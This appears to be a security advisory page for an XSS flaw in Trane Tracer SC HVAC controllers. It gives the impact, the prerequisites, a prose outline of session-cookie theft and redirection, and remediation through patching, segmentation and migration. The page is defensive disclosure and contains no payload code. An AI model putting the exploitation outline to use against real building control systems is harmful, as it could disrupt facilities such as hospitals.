Trane HVAC Systems Controls
Monitor6.3ICS-CERT ICSA-21-292-02Oct 19, 2021
Attack VectorNetwork
Auth RequiredLow
ComplexityLow
User InteractionNone needed
Summary
A Cross-Site Scripting (XSS) vulnerability exists in Trane Tracer SC building automation controllers running firmware v3.8 and prior. An attacker on the network can inject malicious script code into the web interface, which executes in the context of an authenticated user's browser session. This allows the attacker to redirect the user to a malicious webpage and steal their session cookie, potentially gaining unauthorized access to controller functions. The vulnerability affects all Tracer SC firmware versions up to and including v3.8. Tracer SC is end-of-life as of December 31, 2022, and Trane recommends migration to the Tracer SC+ controller.
What this means
What could happen
An attacker with network access could redirect HVAC operators to a malicious website and steal their login cookies, potentially gaining unauthorized access to the building control system. This could allow an attacker to alter temperature setpoints, disable alarms, or disrupt HVAC operations.
Who's at risk
Building facility managers and HVAC operators at any organization running Trane Tracer SC building automation controllers. This affects commercial and institutional buildings relying on Tracer SC for temperature, humidity, and equipment control. Particularly important for critical facilities like hospitals, data centers, and manufacturing plants where HVAC disruption could impact operations or safety.
How it could be exploited
An attacker on the network could perform a Cross-Site Scripting (XSS) attack against the Tracer SC web interface. By injecting malicious script code, the attacker could redirect an authenticated user to a fake login page or malicious site to capture their session cookie, then use that cookie to access the controller without needing their password.
Prerequisites
- Network access to the Tracer SC web interface (typically port 80 or 443)
- User must be logged into the Tracer SC controller or visit a malicious link while authenticated
- No special credentials required to exploit the XSS vulnerability itself
Remotely exploitable over networkNo authentication required for the XSS attack itselfLow complexity attackEnd-of-life product—vendor will not provide long-term supportAffects building control systems that operators rely on daily
Exploitability
Low exploit probability (EPSS 0.3%)
Affected products (1)
ProductAffected VersionsFix Status
Tracer SC: Firmware v3.8 and prior≤ 3.8v4.4 SP7 or higher
Remediation & Mitigation
0/3
Do now
0/1HARDENINGImplement network segmentation to restrict access to the Tracer SC web interface to only authorized engineering workstations and management networks. Use firewall rules to limit inbound connections to port 80/443 on the controller.
Schedule — requires maintenance window
0/1Patching may require device reboot — plan for process interruption
HOTFIXUpgrade Tracer SC firmware to version 4.4 SP7 or higher. Contact a regional Trane office to perform the firmware update or reference service database number HUB-207592.
Long-term hardening
0/1HARDENINGDevelop and execute a migration plan to replace Tracer SC controllers with Tracer SC+ controllers, which provide enhanced security and are actively maintained. Tracer SC reaches end-of-life on December 31, 2022.
CVEs (1)
↑↓ Navigate · Esc Close
API:
/api/v1/advisories/9e329ee4-6309-461f-99c3-7b76900d8b8f